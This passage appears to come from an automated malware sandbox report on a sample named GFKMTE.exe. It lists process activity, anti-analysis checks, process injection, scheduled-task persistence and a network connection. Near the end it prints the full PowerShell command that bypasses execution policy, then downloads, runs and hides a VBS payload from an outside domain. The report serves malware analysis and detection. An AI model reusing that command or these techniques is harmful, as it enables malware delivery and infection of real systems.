                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: E90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2930000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 26A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 4F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 7080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 73D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 83D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 4F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 9070000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 4F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6080000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 73D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 11E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2D20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2C30000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 3010000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 3200000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5200000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 26C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2810000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 4810000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2980000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 29B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 49B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 50B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 60B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 61E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 71E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 7570000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 8570000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 50B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 61E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 8210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 9210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: A210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 7750000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: B210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: C210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: D210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2790000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2790000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 4790000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2F10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 3190000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 2F10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 18C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 3270000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory allocated: 3180000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: EC0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2A40000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: F70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 7160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 74C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 84C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 8160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 9160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 5030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 6160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 14D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 3040000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2EE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: EF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2A60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: 2870000 memory reserve | memory write watch
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5675Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4069Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeWindow / User API: threadDelayed 3969
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeWindow / User API: threadDelayed 5853
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\wscript.exe TID: 7184Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 7436Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8064Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8104Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8164Thread sleep count: 40 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8164Thread sleep time: -36893488147419080s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 2632Thread sleep count: 3969 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 2632Thread sleep count: 5853 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 1652Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe TID: 3088Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe TID: 5528Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe TID: 1516Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe TID: 1860Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe TID: 6212Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeThread delayed: delay time: 922337203685477
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                        Source: wscript.exe, 0000000A.00000003.1467671580.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1491729771.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473511321.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1477018602.0000029430A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                        Source: GFKMTE.exe, 00000016.00000002.1489866475.00000000012EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                        Source: GFKMTE.exe, 00000017.00000002.2513164888.0000000001398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^W
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                        Source: powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1492087570.0000029430A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1477180615.0000029430A1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1467671580.0000029430A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473511321.0000029430A70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1476093130.0000029430A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2517390624.000002DD7D42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2523382410.000002DD7EC5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: GFKMTE.exe, 00000016.00000002.1489866475.00000000012EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000001.00000002.1391471213.000001BD2EECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess queried: DebugPort
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 94.156.167.57 443Jump to behavior
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_2892.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2892, type: MEMORYSTR
                        Bypasses PowerShell execution policy
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeMemory written: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe "C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
